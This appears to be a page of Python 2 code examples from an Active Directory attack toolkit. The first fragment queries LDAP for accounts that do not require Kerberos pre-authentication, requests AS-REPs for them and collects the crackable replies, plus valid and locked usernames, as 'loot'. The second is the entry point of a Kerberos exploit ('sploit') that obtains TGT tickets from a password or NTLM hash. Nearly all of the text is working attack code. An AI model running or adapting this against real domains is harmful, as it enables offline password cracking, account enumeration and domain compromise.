        # Exact-equality match on the composite UAC value 4260352 (0x410200 ==
        # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH); an account
        # with any other bit combination is not returned, which is what the
        # todo above refers to. (`filter` shadows the builtin.)
        filter = "(userAccountControl=4260352)"
        #attributes = ['sAMAccountName','memberOf' ]
        attributes = ['*' ]

        # Search! 
        result = conn.search_s( basedn, scope, filter, attributes )
        for r in result:
            print r[1]['sAMAccountName'][0]
            #print r[1]
            if 'primaryGroupID' in r[1]:
                print '  primaryGroupID = '+r[1]['primaryGroupID'][0] 
            if 'distinguishedName' in r[1]:
                print '  distinguishedName = '+r[1]['distinguishedName'][0] 
            if 'objectSid' in r[1]:
                # Binary SID -> "S-..." string, read at fixed offsets: byte 0
                # revision, byte 1 sub-authority count (SA, computed but never
                # used), bytes 2-8 identifier authority (big-endian), then five
                # little-endian 32-bit sub-authorities. A SID with fewer than
                # five sub-authorities gives empty slices, and int('', 16)
                # raises ValueError -- not an LDAPError, so it escapes this
                # function.
                objSid = r[1]['objectSid'][0]
                SRL = str(int(binascii.b2a_hex(objSid[0]), 16))
                SA = str(int(binascii.b2a_hex(objSid[1]), 16))
                IAV = str(int(binascii.b2a_hex(objSid[2:8]), 16))
                RIDa = str(int(binascii.b2a_hex(objSid[8:12][::-1]), 16))
                RIDb = str(int(binascii.b2a_hex(objSid[12:16][::-1]), 16))
                RIDc = str(int(binascii.b2a_hex(objSid[16:20][::-1]), 16))
                RIDd = str(int(binascii.b2a_hex(objSid[20:24][::-1]), 16))
                RIDe = str(int(binascii.b2a_hex(objSid[24:28][::-1]), 16))
                sid = 'S-'+SRL+'-'+IAV+'-'+RIDa+'-'+RIDb+'-'+RIDc+'-'+RIDd+'-'+RIDe
                print '  Sid = '+sid
                user_sid = sid
            else:
                # No objectSid returned: fall back to a fixed placeholder SID.
                user_sid = 'S-1-5-21-3623811015-3361044348-30300820-1013'
            if 'badPwdCount' in r[1]:
                print '  badPwdCount = '+r[1]['badPwdCount'][0] 
            if 'givenName' in r[1]:
                print '  givenName = '+r[1]['givenName'][0] 

            # No pre-auth: throwaway key derived from a single NUL byte.
            krbTricks.set_arg['pre'] = False
            user_key = (RC4_HMAC, ntlm_hash("\x00").digest())
            try:
                net_get_as_rep(binddomain, r[1]['sAMAccountName'][0], user_sid, user_key, dc)
                # Reply expected hex-encoded in set_arg['net_krbas'] (presumably
                # stored by net_get_as_rep -- confirm). Spec-less decode: rep[1]
                # is msg-type; rep[4] is taken to be the KRB-ERROR error-code,
                # which holds when the optional ctime/cusec are absent -- confirm.
                rep = decoder.decode(krbTricks.set_arg['net_krbas'].decode('hex'))[0]
                # 11 == AS-REP: ticket issued without pre-auth; keep the blob.
                if rep[1] == 11:
                    print "  [+] Got a valid AS-REP for %s... Done!" % r[1]['sAMAccountName'][0]
                    krbTricks.loot.append({'user_name':r[1]['sAMAccountName'][0], 'domain':binddomain, 'target_service':'krbtgt', 'krbas':krbTricks.set_arg['net_krbas']})
                # 25 == KDC_ERR_PREAUTH_REQUIRED: account exists, pre-auth enforced.
                if rep[4] == 25:
                    print "  [-] Invalid AS-REP for %s... " % r[1]['sAMAccountName'][0]
                    print "  [+] Got a valid user name (%s)... Done!" % r[1]['sAMAccountName'][0]
                    krbTricks.loot.append({'user_name':r[1]['sAMAccountName'][0], 'domain':binddomain, 'target_service':'krbtgt' })
                # 18 == KDC_ERR_CLIENT_REVOKED: account exists but is locked/disabled.
                if rep[4] == 18:
                    print "  [-] Invalid AS-REP for %s... " % r[1]['sAMAccountName'][0]
                    print "  [+] %s locked... Done!" % r[1]['sAMAccountName'][0]
                    krbTricks.loot.append({'user_name':r[1]['sAMAccountName'][0], 'domain':binddomain, 'target_service':'krbtgt' })
                # 6 == KDC_ERR_C_PRINCIPAL_UNKNOWN: nothing recorded.
                if rep[4] == 6:
                    print "  [-] Not a valid user name (%s)... " % r[1]['sAMAccountName'][0]
                    # principal unknown i.e. not a user
                krbTricks.set_arg['padata_type'] = ''

            except:
                # Bare except: send/decode failures print a message and the loop
                # continues with the next account (the return is commented out).
                print(' can\'t send data to the DC ?\n')
            #    return

        # NOTE(review): the observable footprint on the DC is this one LDAP
        # search followed by a TGT request (event 4768) per returned account.
        show('users')
    except ldap.LDAPError as e:
        print e
Example #14
        #print >> sys.stderr, '    -p <clearPassword>'
        #print >> sys.stderr, ' --rc4 <ntlmHash>'
        sys.exit(1)

    opts, args = getopt(sys.argv[1:], 'u:d:p:', ['rc4='])
    opts = dict(opts)
    if not all(k in opts for k in ('-u', '-d')):
        usage_and_exit()

    user_name, user_realm = opts['-u'].split('@', 1)
    #user_sid = opts['-s']
    kdc_a = opts['-d']

    if '--rc4' in opts:
        user_key = (RC4_HMAC, opts['--rc4'].decode('hex'))
        assert len(user_key[1]) == 16
    elif '-p' in opts:
        user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest())
    else:
        user_key = (RC4_HMAC, ntlm_hash(' ').digest())

    target_realm = user_realm
    target_service = target_host = kdc_b = None
    filename = 'TGT_%s@%s.ccache' % (user_name, user_realm)

    user_realm = user_realm.upper()
    target_realm = target_realm.upper()

    sploit(user_realm, user_name, user_key, kdc_a, kdc_b, target_realm,
           target_service, target_host, filename)